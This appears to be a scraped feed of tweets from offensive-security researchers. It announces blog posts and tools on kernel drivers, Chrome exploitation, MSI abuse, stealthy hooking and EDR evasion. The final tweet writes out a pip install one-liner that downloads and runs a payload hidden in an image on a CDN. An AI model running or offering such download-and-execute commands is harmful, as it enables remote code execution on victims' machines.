V3ded

I’m releasing the second part of my driver development series. Throughout the post I will explore the Windows Filtering Platform (WFP) and its use in handling specifically crafted ICMP network packets. Let me know what you think! v3ded.github.io/redteam/red-te… #redteam #infosec

Back in 2018, I released a post on how to break into pentesting, and it's been shared widely in the security community ever since. With so many changes in the field, I've reworked the post to reflect current standards and answer more questions. Enjoy! jhalon.github.io/breaking-into-…

@ClumsyLulz You’ll find out soon 😁

New blog post, perhaps 👀?

Dang

Oh maaan. Process creation from kernel mode is such a pain.

@jack_halon @SaveToNotion

In 2023, I wish for all Red Teams to finally understand that "unhooking APIs" or using "system calls" doesn't equate to an "edr bypass". Kernel Callbacks/Telemetry is a thing, so even if you get around a prevention policy, that doesn't mean you've "blinded the edr".

To wrap up 2022, I'm releasing the final part of my 3-part browser exploitation series on Chrome! In this post, we demonstrate the practical use of the concepts we've learned throughout the series by analyzing and exploiting CVE-2018-17463. Enjoy! jhalon.github.io/chrome-browser…

I just published a new blog post on (offensive) Windows kernel driver development. Hoping to make this into a nice series. Let me know what you think 😁! v3ded.github.io/redteam/red-te… #redteam #infosec

New blog coming sometime tomorrow 👀!

Here is ENLBufferPwn (CVE ID pending), a severe vulnerability in many first party 3DS, Wii U and Switch games. It allows remote code execution in a victim console by just having an online game session with an attacker. Vulnerability report: github.com/PabloMK7/ENLBu… 🧵(1/7)

☢️ Recently we started seeing Threat Actors abusing MSI Windows Installation files for Initial Access & code execution 🔥 I now release Part 1 insights into how MSIs can be abused, PoCs for 🔴 & dissection utility for 🔵 🦠 Let me know what you think! bit.ly/3jc6myt

StealthHook - A method for hooking functions without modifying memory protection. This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception. x86matthew.com/view_post?id=s…

I wrote a blog post that talks about how we can abuse yet another Chrome Remote Debugging feature to "stalk" end users. posts.specterops.io/stalking-insid…

We've updated our paper collection. The new papers demonstrate the following: - Resolving syscalls in C# - HeavensGate in C# - Thread Stack Spoofing - Inline syscalls in C++ - Inline function calls in C++ - x64 return address spoofing vx-underground.org/windows.html

🔥🔥🔥

Here you go folks, initial release of Volumiser. Dealing with those 100G virtual disc images during red team ops just got easier. Limited testing so far so would love to hear about any problems that pop up. github.com/CCob/Volumiser

Microsoft has just released a patch for ZIP MOTW vulnerability assigned as CVE-2022-41091. I am happy to be able to finally drop my bug analysis write-up! 🔥🪲 Enjoy and happy patching! breakdev.org/zip-motw-bug-a…

I just published dissect.cobaltstrike v1.0.0. It now supports parsing and decrypting C2 traffic from PCAP files and also adds Beacon Client support which allows you to connect to a Team Server and receive tasks and send back data like a real Beacon. github.com/fox-it/dissect…

TIL python's pip will execute a setup .py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"